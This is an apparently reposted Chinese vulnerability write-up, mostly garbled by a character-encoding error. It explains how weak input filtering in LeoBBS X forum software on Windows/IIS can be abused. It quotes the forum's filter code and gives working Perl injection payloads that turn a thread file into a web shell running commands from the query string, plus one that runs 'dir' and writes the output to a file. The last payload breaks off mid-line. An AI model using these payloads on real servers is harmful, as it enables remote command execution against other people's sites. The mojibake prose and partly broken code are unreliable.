À×°ÁÂÛ̳¹ýÂ˲»ÑÏ©¶´

[zt]À×°ÁÂÛ̳¹ýÂ˲»ÑÏ©¶´

µÚÒ»´ÎдÕâЩ¶«Î÷£¬»¶Ó­´ó¼ÒÅÄש~

ÊÊÓð汾 leoBBS X ÂÛ̳ Ò»°ã¶¼´æÔڵĩ¶´ £¨²âÊÔÁ˼¸¸ö£¬¶¼Óеģ©~
ÊÊÓÃϵͳ win2000+ iis
cgi ½âÎö·½Ê½ perl.exe %s %s ,perlis.dll

©¶´Ô­Àí£º
ÀûÓÃÁ˶ÔÓû§ÊäÈëµÄ¹ýÂ˲»ÑÏ£¬±àд´úÂ룬´Ó¶ø»ñµÃshell¡£
½áºÏÀûÓÃregister.cgi ºÍpost.cgi ¹ýÂ˲»ÑÏ¡£

1¡¢¿´ÏÂlb ÂÛ̳µÄregister.cgi×¢²áÖеĹýÂË£¬

for ('inmembername'...)
$tp = $query->param($_);
$tp = &unHTML("$tp");
${$_} = $tp;
}

sub unHTML {} ÀïÃæµÄ¶«Î÷²»ÖØÒª¡£



&error("Óû§×¢²á&¶Ô²»Æð£¬ÄúÊäÈëµÄÓû§ÃûÓÐÎÊÌ⣬Çë²»ÒªÔÚÓû§ÃûÖаüº¬\@\#\$\%\^\*\(\)\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]ÕâÀà×Ö·û£¡") if ($inmembername =~ /[\a\f\n\e\0\r\t\`\~\!\@\#\$\%\^\&\*\(\)\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]/);
if($inmembername =~ /_/) { &error("Óû§×¢²á&Çë²»ÒªÔÚÓû§ÃûÖÐʹÓÃÏ»®Ïߣ¡"); }

$inmembername =~ s/\ \;//ig;
$inmembername =~ s// /g;
$inmembername =~ s/©¡/ /g;
$inmembername =~ s/[ ]+/ /g;
$inmembername =~ s/[ ]+/_/;
$inmembername =~ s/[_]+/_/;
$inmembername =~ s/ÿ//isg;
$inmembername =~ s///isg;
$inmembername =~ s///isg;
$inmembername =~ s/©¡//isg;
$inmembername =~ s/()+//isg;
$inmembername =~ s/[\a\f\n\e\0\r\t\`\~\!\@\#\$\%\^\&\*\(\)\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]//isg;
$inmembername =~ s/\s*$//g;
$inmembername =~ s/^\s*//g;

&error("Óû§×¢²á&¶Ô²»Æð£¬ÄúÊäÈëµÄÓû§ÃûÓÐÎÊÌâ") if ($inmembername =~ /^q(.+?)-/ig);


$inmembername =~ /guest/i)
($inmembername =~ /qq-/i)
($inmembername =~ /q-/i)
($inmembername =~ /qx-/i)
($inmembername =~ /qw-/i)
($inmembername =~ /qr-/i)
($inmembername =~ /no)
($inmembername eq "admin")
($inmembername display/i)
($inmembername =~ /^system/i)
($inmembername =~ /---/ieq "root")
($inmembername eq "copy")
($inmembername =~ /^sub/)
($inmembername =~ /^exec/)
($inmembername =~ /\@ARGV/i)
($inmembername =~ /^require/)
($inmembername =~ /^rename/i)
($inmembername =~ /^dir/i)
($inmembername =~ /^print/i)
($inmembername =~ /^con/i)
($inmembername =~ /^nul/i)
($inmembername =~ /^aux/i)
($inmembername =~ /^com/i)
($inmembername =~ /^lpt/i));

µÈµÈ¡£


¹ýÂ˵Äͦ³¹µ×µÄŶ~

µ«ÊǺöÂÔÁË q¼° qq¡¢qwµÈµÄÔËÓû¹¿ÉÒÔÓÃЩÌØÊâµÄ·ûºÅµÄ£º©£¬ÕâÊÇ×î¹Ø¼üµÄÒ»²½¡?br />
2¡¢ÔÙ¿´ÏÂpost.cgiÀï¶Ô·¢ÌùµÄ¹ýÂË

for ('forum','topic','membername','password','action','postno','inshowsignature',
'notify','inshowemoticons','intopictitle','inshowchgfont',
'inpost','posticon','inhiddentopic','postweiwang','moneyhidden','moneypost','uselbcode','inwater') {
next unless defined $_;
next if $_ eq 'SEND_MAIL';
$tp = $query->param($_);
$tp = &cleaninput("$tp");
${$_} = $tp;
}


sub cleaninput {
my ($self, $text) = _self_or_default(@_);
# my $text = shift;
study($text);
$text =~ s/[\a\f\e\0\r\t]//isg;
$text =~ s/\ / /g;
$text =~ s/\@ARGV/\&\#64\;ARGV/isg;
$text =~ s/\;/\&\#59\;/isg;
$text =~ s/\&/\&/g;
$text =~ s/\&\#/\&\#/isg;
$text =~ s/\&\;(.{1,6})\&\#59\;/\&$1\;/isg;
$text =~ s/\&\#([0-9]{1,6})\&\#59\;/\&\#$1\;/isg;
$text =~ s/"/\"/g;
$text =~ s/ / \ /g;
$text =~ s/</\&lt;/g;
$text =~ s/>/\&gt;/g;
$text =~ s/ / /g;
$text =~ s/\n\n/<p>/g;
$text =~ s/\n/<br>/g;
$text =~ s/document.cookie/documents\&\#46\;cookie/isg;
$text =~ s/'/\&\#039\;/g;
$text =~ s/#/#/isg;
$text =~ s/&#/&#/isg;
return $text;
}

Ö»Òª±àдµÄ´úÂëÈĹýÉÏÃæµÄ¹ýÂËÄÜÔËÐУ¬¾Í¿ÉÒԵġ£

3¡¢Èç´ËÕë¶Ôwin2000µÄ»ú×Ó¿ÉÒÔÓÐÏÂÃæµÄ·½·¨È¡µÄshellµÄ
ÓÃperl.exe ½âÎöµÄ»°

Óà q€q ΪÓû§Ãû×¢²á € ºóÃæËæÒâд£¬×ÔȻҲ¿ÉÒÔÓñðµÄ·ûºÅµÄ£¬
Ëû¿É²»ÊÇ Óà s/\`\~\!\@\#\$\%\^\&\*\(\)\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]//isg;
~ /^q(.+?)-/ig

($inmembername =~ /qq-/i)
($inmembername =~ /q-/i)
($inmembername =~ /qx-/i)
($inmembername =~ /qw-/i)
($inmembername =~ /qr-/i)
¾ÍÄÜÈ«²¿¹ýÂ˵ôµÄ£º£©¡£


½Ó×ÅÖ»ÒªÔÚ·¢ÌùµÄÄÚÈÝÖÐдÈë

€ and ($_=$ENV{QUERY_STRING}) and (s/%20/ /ig) and ($out=`$_`) and (print $out)

¸ÃforumÏÂ*.thd.cgi ¾ÍÊǸö¼òµ¥µÄshellÁË¡£

Óà perlis.dll½âÎöµÄ»°£¬¹¹ÔìºÃµÄ»°£¬Ò²ÄÜʵÏÖÄ¿µÄµÄ¡££¨ÊÔÁËÏ£¬¿ÉÒÔÓÃ
€ and($cmd=q-dir ..- )and ($t=q-1.rar- )and (@s=`$cmd`) and sysopen(AA,$t,1

¹Ø¼ü´Ê£ºÀ×°ÁÂÛ̳¹ýÂ˲»ÑÏ©¶´